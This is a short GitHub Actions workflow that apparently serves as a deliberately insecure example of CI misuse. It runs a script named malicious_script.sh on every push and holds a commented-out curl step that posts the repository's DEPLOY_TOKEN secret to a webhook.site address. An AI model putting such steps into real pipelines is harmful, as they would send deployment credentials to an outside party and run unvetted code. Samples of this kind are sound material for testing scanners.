name: Ungoverned Usage of 3rd Party Services
on: push

jobs:
  code-analysis:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v6
      
      - name: Execute script
        run: |
          chmod +x malicious_script.sh
          ./malicious_script.sh

      # - name: Run 3rd Party Analysis
      #   run: |
      #     curl -X POST https://webhook.site/4e63780c-db62-4eab-ab7b-b1f2213be4c2 \
      #       -H "Content-Type: application/json" \
      #       -d "{\"token\": \"${{ secrets.DEPLOY_TOKEN }}\", \"data\": \"report_data\"}"